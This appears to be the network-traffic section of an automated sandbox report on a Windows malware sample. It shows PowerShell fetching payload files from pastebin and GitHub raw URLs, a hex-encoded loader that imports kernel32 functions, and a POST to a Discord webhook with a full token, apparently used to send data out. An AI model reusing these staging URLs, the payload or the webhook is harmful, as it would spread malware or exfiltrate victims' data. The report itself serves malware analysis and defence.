                                                                                                • pastebin.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.362863104.20.3.235804116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:54:54.745069981 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:54:55.356730938 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Tue, 15 Oct 2024 13:54:55 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 167
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Tue, 15 Oct 2024 14:54:55 GMT
                                                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304dc78ce4e952-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.362865185.199.110.133804116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:54:56.256139994 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:54:56.860342026 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                Connection: close
                                                                                                Content-Length: 0
                                                                                                Server: Varnish
                                                                                                Retry-After: 0
                                                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:56 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120058-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000497.794649,VS0,VE0
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Expires: Tue, 15 Oct 2024 13:59:56 GMT
                                                                                                Vary: Authorization,Accept-Encoding


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.362867104.20.3.235807688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:55:01.595312119 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:55:02.453439951 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Tue, 15 Oct 2024 13:55:02 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 167
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Tue, 15 Oct 2024 14:55:02 GMT
                                                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304df24f62e76e-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                Oct 15, 2024 15:55:02.453788996 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Tue, 15 Oct 2024 13:55:02 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 167
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Tue, 15 Oct 2024 14:55:02 GMT
                                                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304df24f62e76e-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.362869185.199.110.133807688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:55:03.468152046 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:55:04.058543921 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                Connection: close
                                                                                                Content-Length: 0
                                                                                                Server: Varnish
                                                                                                Retry-After: 0
                                                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:55:03 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120059-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000504.994470,VS0,VE0
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Expires: Tue, 15 Oct 2024 14:00:03 GMT
                                                                                                Vary: Authorization,Accept-Encoding


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.349710185.199.111.1334437900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:54:11 UTC228OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:54:11 UTC900INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 25709
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "2749e85a66d302dd1b2de7bbbef139d24889d7fb591ff86f76222d3238ccbfa0"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: CA78:DAD32:A40E5F:B3C958:670E7401
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:11 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120028-DFW
                                                                                                X-Cache: MISS
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000451.481151,VS0,VE32
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: f5f5b1626e924c074f9559bb76f255e67037f958
                                                                                                Expires: Tue, 15 Oct 2024 13:59:11 GMT
                                                                                                Source-Age: 0
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 24 62 79 74 65 73 20 3d 20 40 28 30 78 32 34 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 37 39
                                                                                                Data Ascii: $bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 36 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78
                                                                                                Data Ascii: 0x73, 0x00, 0x73, 0x00, 0x20, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x2F, 0x00, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20
                                                                                                Data Ascii: 0, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x20, 0x00, 0x64, 0x00, 0x65, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30
                                                                                                Data Ascii: x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x29, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 34 42 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 33 33 2c 20 30 78 30 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78
                                                                                                Data Ascii: 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x74, 0x00, 0x28, 0x00, 0x4B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x62, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20
                                                                                                Data Ascii: E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x74, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x2C, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 34 37 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30
                                                                                                Data Ascii: x47, 0x00, 0x65, 0x00, 0x74, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x28, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 35 41 2c 20 30 78 30 30 2c 20 30 78
                                                                                                Data Ascii: 0x20, 0x00, 0x28, 0x00, 0x68, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x2E, 0x00, 0x5A, 0x00, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20
                                                                                                Data Ascii: 0, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 35 2c 20 30 78 30 30 2c 20 30 78 37 38 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30
                                                                                                Data Ascii: x00, 0x20, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x20, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x65, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.349711185.199.111.1334437676C:\Users\user\Desktop\Lm9IJ4r9oO.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:54:12 UTC132OUTGET /labail300/psapi/main/modmenu.txt HTTP/1.1
                                                                                                User-Agent: Downloader
                                                                                                Host: raw.githubusercontent.com
                                                                                                Cache-Control: no-cache
                                                                                                2024-10-15 13:54:12 UTC806INHTTP/1.1 404 Not Found
                                                                                                Connection: close
                                                                                                Content-Length: 14
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                X-GitHub-Request-Id: 928E:1FAF94:22FD91A:26C82AF:670E7404
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:12 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120091-DFW
                                                                                                X-Cache: MISS
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000453.642054,VS0,VE151
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 6b3c7bc31e0ff925eb9dd89267d80fb5f0da6f0f
                                                                                                Expires: Tue, 15 Oct 2024 13:59:12 GMT
                                                                                                Source-Age: 0
                                                                                                2024-10-15 13:54:12 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                                Data Ascii: 404: Not Found


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.362862162.159.138.2324437900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:54:51 UTC311OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 212
                                                                                                Connection: Keep-Alive
